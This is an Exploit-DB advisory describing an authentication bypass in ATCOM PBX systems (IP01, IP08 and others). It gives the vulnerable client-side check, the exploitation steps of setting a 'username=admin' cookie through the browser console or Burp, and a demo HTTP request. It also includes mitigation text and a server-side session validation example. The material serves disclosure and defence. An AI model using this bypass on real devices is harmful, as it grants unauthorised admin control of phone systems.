Vendor: ATCOM PBX system
By: i-Hmx
CVSS: 5.5 (MEDIUM)
Authentication Bypass
CWE: 287
Product Name: ATCOM PBX system
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: ATCOM IP01, IP08, IP4G, ip2G4A

ATCOM PBX system, auth bypass exploit

The ATCOM PBX system is affected by an authentication bypass vulnerability that allows an attacker to gain admin access without prior authentication. The vulnerability exists in the 'js/util.js' file, where the security check relies on the presence of a 'username' value in the cookies. If the value is not present, the user is redirected to the login page. By manipulating the cookies and setting 'username=admin', an attacker can bypass the authentication and gain admin access.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper authentication mechanisms that do not rely solely on client-side checks. Additionally, the cookies should be encrypted and validated on the server side.
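
One way to apply this mitigation, shown as an added example that is not code from the advisory or from ATCOM firmware: the server issues a random session ID at login and checks it on every request to the admin pages, so a client-supplied `username=admin` cookie carries no authority. The function names, the `session` cookie name, the timeout and the in-memory store are assumptions for illustration.

```javascript
// Added example (hypothetical names): server-side session validation.
const crypto = require('crypto');

const SESSION_TTL_MS = 15 * 60 * 1000;   // assumed idle limit
const sessions = new Map();              // sessionId -> { username, expires }

// Parse a Cookie request header into a name -> value object.
function parseCookies(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    out[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return out;
}

// Call only after the password has been verified on the server.
function createSession(username, now = Date.now()) {
  const id = crypto.randomBytes(32).toString('hex'); // unguessable token
  sessions.set(id, { username, expires: now + SESSION_TTL_MS });
  return id;
}

// Set-Cookie value: HttpOnly keeps the token out of document.cookie.
function sessionCookie(id) {
  return `session=${id}; HttpOnly; SameSite=Strict; Path=/`;
}

// Identity comes from the server-side store, never from a cookie value.
function authenticate(cookieHeader, now = Date.now()) {
  const sid = parseCookies(cookieHeader).session;
  if (typeof sid !== 'string' || !/^[0-9a-f]{64}$/.test(sid)) return null;
  const entry = sessions.get(sid);
  if (!entry) return null;
  if (entry.expires <= now) { sessions.delete(sid); return null; }
  return entry.username;
}

// Gate for every request under /admin/, enforced before any page is served.
function handleAdminRequest(cookieHeader, now = Date.now()) {
  const user = authenticate(cookieHeader, now);
  if (user !== 'admin') return { status: 302, location: '/login.html' };
  return { status: 200, user };
}
```
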

Exploit-DB raw data:

# Title: ATCOM PBX system , auth bypass exploit
# Author: i-Hmx
# contact : n0p1337@gmail.com
# Home : sec4ever.com
# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A

Details
The mentioned system is affected by an auth bypass flaw that allows an attacker to get admin access on the vulnerable machine without prior access
The security check is really stupid, depends on js
affected lines

js/util.js
function alertWithoutLogin(){
    var username = getCookie("username");
    //alert(username);
    if(!!!username){
        alert('Sorry, permission denied. Please login first!');
    }
}

so actually it just checks if the username value exists in cookies
and if not, redirects to login.html
just like that!!!!!!!!!!!!!

exploitation?!
just from the browser, press F12, open the console
type document.cookie="username=admin"
or from burp intercept proxy and set the cookies as well
go to ip/admin/index.html
and you are in, simple like that :/

Demo request

GET /admin/index.html HTTP/1.1
Host: 192.168.44.12
User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: username=admin
Connection: close
Upgrade-Insecure-Requests: 1

From Eg-R1z with love
./Faris